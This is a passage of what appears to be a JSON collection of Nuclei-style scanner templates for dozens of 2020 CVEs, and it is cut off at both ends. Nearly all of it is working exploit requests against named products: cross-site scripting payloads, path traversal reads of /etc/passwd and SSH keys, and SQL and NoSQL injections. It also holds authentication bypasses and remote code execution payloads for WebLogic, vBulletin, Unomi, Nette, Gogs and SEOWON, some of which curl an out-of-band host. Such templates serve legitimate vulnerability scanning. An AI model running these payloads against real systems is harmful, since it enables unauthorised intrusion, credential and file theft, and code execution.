aGlzSXNSbmQ3MzgwPC9wYXNzd29yZD4KICAgICAgICAgICAgICA8L1BDS1JlY2VpdmVyPgogICAgICAgICAgICAgIDxQQ0tNb25pdG9yPgogICAgICAgICAgICAgICAgPHVzZXJOYW1lPlRoaXNJc1JuZDczODA8L3VzZXJOYW1lPgogICAgICAgICAgICAgICAgPHBhc3N3b3JkIHNlY3VyZT0idHJ1ZSI+VGhpc0lzUm5kNzM4MDwvcGFzc3dvcmQ+CiAgICAgICAgICAgICAgPC9QQ0tNb25pdG9yPgogICAgICAgICAgICAgIDxQQ0tBZG1pbj4KICAgICAgICAgICAgICAgIDx1c2VyTmFtZT5UaGlzSXNSbmQ3MzgwPC91c2VyTmFtZT4KICAgICAgICAgICAgICAgIDxwYXNzd29yZCBzZWN1cmU9InRydWUiPlRoaXNJc1JuZDczODA8L3Bhc3N3b3JkPgogICAgICAgICAgICAgIDwvUENLQWRtaW4+CiAgICAgICAgICAgIDwvVXNlcm1hbmFnZW1lbnQ+CiAgICAgICAgICA8L1BDSz4KICAgIA==\n</baData><name>userDetails</name></contextMessages></urn:executeSynchronious></soapenv:Body></soapenv:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["CTCWebServiceSi","SOAP-ENV"],"condition":"and"},{"type":"word","part":"header","words":["text/xml","SAP NetWeaver Application Server"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-23697","info":{"name":"Monstra CMS 3.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /admin/index.php?id=dashboard HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlogin={{username}}&password={{password}}&login_submit=Log+In\n","GET /admin/index.php?id=pages&action=add_page HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","POST /admin/index.php?id=pages&action=add_page HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncsrf={{csrf}}&page_title=%22%27%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&page_name={{string}}&page_meta_title=&page_keywords=&page_description=&pages=0&templates=index&status=published&access=public&editor=test&page_tags=&add_page_and_exit=Save+and+Exit&page_date=2023-01-09+18%3A22%3A15\n","GET /{{string}} HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["contains(header_4, \"text/html\")","status_code_4 == 200","contains(body_4, \"><script>alert(document.domain)</script>\") && contains(body_4, \"Monstra\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["id=\"csrf\" name=\"csrf\" value=\"(.*)\">"],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-35338","info":{"name":"Wireless Multiplex Terminal Playout Server <=20.2.8 - Default Credential Detection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/server/"],"headers":{"Authorization":"Basic OnBva29u"},"matchers-condition":"and","matchers":[{"type":"word","words":["<title>WMT Server playout"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-17506","info":{"name":"Artica Web Proxy 4.30 - Authentication Bypass/SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;"],"host-redirects":true,"max-redirects":1,"matchers-condition":"and","matchers":[{"type":"word","words":["artica-applianc"]},{"type":"word","part":"header","words":["PHPSESSID"]},{"type":"status","status":[200,301,302],"condition":"or"}],"extractors":[{"type":"kval","kval":["PHPSESSID"]}]}]},{"id":"CVE-2020-8512","info":{"name":"IceWarp WebMail Server <=11.4.4.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(document.domain)>","<strong>IceWarp"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24148","info":{"name":"Import XML & RSS Feeds WordPress Plugin <= 2.0.1 Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=moove_read_xml"],"body":"type=url&data=http%3A%2F%2F{{interactsh-url}}%2F&xmlaction=preview&node=0","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-35736","info":{"name":"GateOne 1.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/downloads/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-14883","info":{"name":"Oracle Fusion Middleware WebLogic Server Administration Console - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1\nHost: {{Hostname}}\nAccept-Language: en\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip, deflate\n\ntest_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField(\"connectionHandler\");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod(\"getServletRequest\").invoke(obj); String result = new StringBuilder(\"{{str}}\").reverse().toString(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod(\"getResponse\").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush(); currentThread.interrupt();')\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["ADMINCONSOLESESSION"]},{"type":"word","part":"body","words":["{{revstr}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-12127","info":{"name":"WAVLINK WN530H4 M30H4.V5030.190403 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/ExportAllSettings.sh"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Login=","Password=","Model=","AuthMode="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-7318","info":{"name":"McAfee ePolicy Orchestrator <5.10.9 Update 9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /PolicyMgmt/policyDetailsCard.do?poID=19&typeID=3&prodID=%27%22%3E%3Csvg%2fonload%3dalert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["Policy Name","'\"><svg/onload=alert(document.domain)>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11455","info":{"name":"LimeSurvey 4.1.11 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-14179","info":{"name":"Atlassian Jira Server/Data Center <8.5.8/8.6.0 - 8.11.1 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/secure/QueryComponent!Default.jspa"],"matchers-condition":"and","matchers":[{"type":"word","words":["{\"searchers\":","\"groups\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13167","info":{"name":"Netsweeper <=6.4.3 - Python Code Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%27{{url_encode(hex_encode(cmd))}}%27.decode%28%27hex%27%29%29%23&timeout=5","{{BaseURL}}/webadmin/out"],"headers":{"Referer":"{{BaseURL}}/webadmin/admin/service_manager_data.php"},"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{rand_str}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-5405","info":{"name":"Spring Cloud Config - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35951","info":{"name":"Wordpress Quiz and Survey Master <7.0.1 - Arbitrary File Deletion","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryBJ17hSJBjuGrnW92\n\n\n------WebKitFormBoundaryBJ17hSJBjuGrnW92\nContent-Disposition: form-data; name=\"action\"\n\nqsm_remove_file_fd_question\n------WebKitFormBoundaryBJ17hSJBjuGrnW92\nContent-Disposition: form-data; name=\"file_url\"\n\n{{fullpath}}wp-content/plugins/quiz-master-next/README.md\n------WebKitFormBoundaryBJ17hSJBjuGrnW92--\n","GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains((body_1), '# Quiz And Survey Master') && status_code_4==301 && !contains((body_4), '# Quiz And Survey Master')"]},{"type":"word","part":"body","words":["{\"type\":\"success\",\"message\":\"File removed successfully\"}"]}],"extractors":[{"type":"regex","name":"fullpath","group":1,"regex":["not found in <b>([/a-z_]+)wp"],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-5191","info":{"name":"PHPGurukul Hospital Management System - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /hospital/hms/admin/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&submit=&submit=\n","POST /hospital/hms/admin/doctor-specilization.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ndoctorspecilization=%3C%2Ftd%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3Ctd%3E&submit=\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<td class=\"hidden-xs\"></td><script>alert(document.domain);</script><td>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-14864","info":{"name":"Oracle Fusion - Directory Traversal/Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/analytics/saw.dll?bieehome&startPage=1","{{BaseURL}}/analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-15227","info":{"name":"Nette Framework - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-23517","info":{"name":"Aryanic HighMail (High CMS) - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login/?uid=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E","{{BaseURL}}/?uid=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["value=\"\"><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-15050","info":{"name":"Suprema BioStar <2.8.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../../../../../../../../windows/win.ini"],"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2020-12116","info":{"name":"Zoho ManageEngine OpManger - Arbitrary File Read","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nConnection: close\n","GET {{endpoint}}../../../../bin/.ssh_host_rsa_key HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nCache-Control: max-age=0\nConnection: close\nReferer: http://{{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_2, \"BEGIN RSA PRIVATE KEY\")","status_code_2 == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"endpoint","regex":["(?m)/cachestart/.*/jquery/"],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-29164","info":{"name":"PacsOne Server <7.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pacs/login.php?message=%3Cimg%20src=%22%22%20onerror=%22alert(1);%22%3E1%3C/img%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["<img src=\"\" onerror=\"alert(1);\">1</img>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8772","info":{"name":"WordPress InfiniteWP <1.9.4.5 - Authorization Bypass","severity":"critical"},"requests":[{"raw":["GET /?author=1 HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Language: en-US,en;q=0.9\n","POST / HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nContent-Type: application/x-www-form-urlencoded\n\n_IWP_JSON_PREFIX_{{base64(\"{\\\"iwp_action\\\":\\\"add_site\\\",\\\"params\\\":{\\\"username\\\":\\\"{{username}}\\\"}}\")}}\n"],"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["wordpress_logged_in"]},{"type":"word","part":"body","words":["<IWPHEADER>"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"username","group":1,"regex":["Author:(?:[A-Za-z0-9 -\\_=\"]+)?<span(?:[A-Za-z0-9 -\\_=\"]+)?>([A-Za-z0-9]+)<\\/span>"],"internal":true,"part":"body"},{"type":"regex","name":"username","group":1,"regex":["ion: https:\\/\\/[a-z0-9.]+\\/author\\/([a-z]+)\\/"],"internal":true,"part":"header"}]}]},{"id":"CVE-2020-13942","info":{"name":"Apache Unomi <1.5.2 - Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/context.json"],"body":"{\n  \"filters\": [\n    {\n      \"id\": \"{{id}}\",\n      \"filters\": [\n        {\n          \"condition\": {\n            \"parameterValues\": {\n              \"nuclei\": \"script::Runtime.getRuntime().exec('id')\"\n            },\n            \"type\": \"profilePropertyCondition\"\n          }\n        }\n      ]\n    }\n  ],\n  \"sessionId\": \"nuclei\"\n}\n","headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json","context-profile-id"],"condition":"and"},{"type":"regex","part":"body","regex":["(profile|session)(Id|Properties|Segments)","[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12}"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35580","info":{"name":"SearchBlox <9.2.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/searchblox/servlet/FileServlet?col=9&url=/etc/passwd"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2020-6207","info":{"name":"SAP Solution Manager 7.2 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /EemAdminService/EemAdmin HTTP/1.1\nHost: {{Hostname}}\nSOAPAction: \"\"\nContent-Type: text/xml; charset=UTF-8\nConnection: close\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:adm=\"http://sap.com/smd/eem/admin/\"><soapenv:Header/><soapenv:Body><adm:getAllAgentInfo/></soapenv:Body></soapenv:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[":Envelope",":Body",":getAllAgentInfoResponse"],"condition":"and"},{"type":"word","part":"header","words":["text/xml","SAP NetWeaver Application Server"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-36289","info":{"name":"Jira Server and Data Center - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin","{{BaseURL}}/jira/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["rel=\\\"admin\\\""]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-17496","info":{"name":"vBulletin 5.5.4 - 5.6.2- Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsubWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;\"\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11530","info":{"name":"WordPress Chop Slider 3 - Blind SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout 10s\nGET /wp-content/plugins/chopslider/get_script/index.php?id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))A) HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/javascript\")","contains(body, \"$(document).ready(function()\")"],"condition":"and"}]}]},{"id":"CVE-2020-25780","info":{"name":"Commvault CommCell - Local File Inclusion","severity":"high"},"requests":[{"method":"POST","path":["http://{{Host}}:81/SearchSvc/CVSearchService.svc"],"body":"<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:tem=\"http://tempuri.org/\">\n   <soapenv:Header/>\n   <soapenv:Body>\n      <tem:downLoadFile>\n         <tem:path>c:/Windows/system.ini</tem:path>\n      </tem:downLoadFile>\n   </soapenv:Body>\n</soapenv:Envelope>\n","headers":{"Cookie":"Login","soapaction":"http://tempuri.org/ICVSearchSvc/downLoadFile","content-type":"text/xml"},"matchers-condition":"and","matchers":[{"type":"word","words":["downLoadFileResult"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8771","info":{"name":"WordPress Time Capsule < 1.21.16 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nConnection: close\nAccept: */*\n\nIWP_JSON_PREFIX\n","GET /wp-admin/index.php HTTP/1.1\nHost: {{Hostname}}\nConnection: close\nAccept: */*\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<div id=\"adminmenumain\" role=\"navigation\" aria-label=\"Main menu\">","<h1>Dashboard</h1>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["wordpress_[a-z0-9]+=([A-Za-z0-9%]+)"],"part":"header"}]}]},{"id":"CVE-2020-12720","info":{"name":"vBulletin SQL Injection","severity":"critical"},"requests":[{"raw":["POST /ajax/api/content_infraction/getIndexableContent HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: XMLHttpRequest\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nnodeId%5Bnodeid%5D=1%20union%20select%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2CCONCAT%28%27vbulletin%27%2C%27rce%27%2C%40%40version%29%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27--+-\n"],"matchers":[{"type":"word","words":["vbulletinrce"]}]}]},{"id":"CVE-2020-15867","info":{"name":"Gogs 0.5.5 - 0.12.2 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}\n","GET /repo/create HTTP/1.1\nHost: {{Hostname}}\n","POST /repo/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&user_id=1&repo_name={{randstr}}&private=on&description=&gitignores=&license=&readme=Default&auto_init=on\n","POST /{{username}}/{{randstr}}/settings/hooks/git/post-receive HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&content=%23%21%2Fbin%2Fbash%0D%0Acurl+{{interactsh-url}}\n","GET /{{username}}/{{randstr}}/_new/master HTTP/1.1\nHost: {{Hostname}}\n","POST /{{username}}/{{randstr}}/_new/master HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&last_commit={{last_commit}}&tree_path=test.txt&content=test&commit_summary=&commit_message=&commit_choice=direct\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body_1","words":["content=\"Gogs"]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"_csrf\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"auth_csrf","group":1,"regex":["name=\"_csrf\" content=\"(.*)\""],"internal":true},{"type":"regex","name":"last_commit","group":1,"regex":["name=\"last_commit\" value=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2020-28185","info":{"name":"TerraMaster TOS < 4.2.06 - User Enumeration","severity":"medium"},"requests":[{"raw":["GET /tos/index.php?user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /wizard/initialise.php HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nReferer: {{RootURL}}/tos/index.php?user/login\n\ntab=checkuser&username=admin\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"username\":","\"email\":","\"status\":"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","part":"body_2","regex":["\"username\":\"(.*?)\"","\"email\":\"(.*?)\""]}]}]},{"id":"CVE-2020-35234","info":{"name":"SMTP WP Plugin Directory Listing","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/easy-wp-smtp/","{{BaseURL}}/wp-content/plugins/wp-mail-smtp-pro/"],"matchers":[{"type":"word","words":["debug","log","Index of"],"condition":"and"}]}]},{"id":"CVE-2020-25540","info":{"name":"ThinkAdmin 6 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-25864","info":{"name":"HashiCorp Consul/Consul Enterprise <=1.9.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["PUT {{BaseURL}}/v1/kv/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\n\n<!DOCTYPE html><script>alert(document.domain)</script>\n","GET {{BaseURL}}/v1/kv/{{randstr}}%3Fraw HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body_2","words":["<!DOCTYPE html><script>alert(document.domain)</script>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-20300","info":{"name":"WeiPHP 5.0 - SQL Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/public/index.php/home/index/bind_follow/?publicid=1&is_ajax=1&uid[0]=exp&uid[1]=)%20and%20updatexml(1,concat(0x7e,md5('999999'),0x7e),1)--+ "],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["52c69e3a57331081823331c4e69d3f2"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2020-17456","info":{"name":"SEOWON INTECH SLC-130 & SLR-120S - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/login.cgi HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nbrowserTime=081119502020&currentTime=1597159205&expires=Wed%252C%2B12%2BAug%2B2020%2B15%253A20%253A05%2BGMT&Command=Submit&user=admin&password=admin\n","POST /cgi-bin/system_log.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nCommand=Diagnostic&traceMode=ping&reportIpOnly=&pingIpAddr=;curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'&pingPktSize=56&pingTimeout=30&pingCount=4&maxTTLCnt=30&queriesCnt=3&reportIpOnlyCheckbox=on&logarea=com.cgi&btnApply=Apply&T=1646950471018\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9043","info":{"name":"WordPress wpCentral <1.5.1 - Information Disclosure","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/index.php HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-login.php?action=logout&_wpnonce={{nonce}} HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-admin/admin-ajax.php?action=my_wpc_signon&auth_key={{authkey}} HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["contains(header_4, 'text/html')","status_code_4 == 200","contains(body_4, 'wpCentral Connection Key')","contains(body_4, \"pagenow = \\'dashboard\\'\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"authkey","group":1,"regex":["style=\"word-wrap:break-word;\">([a-z0-9]+)"],"internal":true,"part":"body"},{"type":"regex","name":"nonce","group":1,"regex":["_wpnonce=([0-9a-z]+)"],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-11034","info":{"name":"GLPI <9.4.6 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?redirect=/\\/interact.sh/","{{BaseURL}}/index.php?redirect=//interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*?)$"]}]}]},{"id":"CVE-2020-10220","info":{"name":"rConfig 3.9 - SQL injection","severity":"critical"},"requests":[{"raw":["GET /commands.inc.php?searchOption=contains&searchField=vuln&search=search&searchColumn=command%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,md5({{num}}),0x5B50574E5D3C42523E)%20limit%200,1),NULL-- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35846","info":{"name":"Agentejo Cockpit < 0.11.2 - NoSQL Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/auth/check"],"body":"{\n  \"auth\": {\n    \"user\": {\n      \"$eq\": \"admin\"\n    },\n    \"password\": [\n      0\n    ]\n  }\n}\n","headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["password_verify() expects parameter"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13483","info":{"name":"Bitrix24 <=20.0.0 - Cross-Site 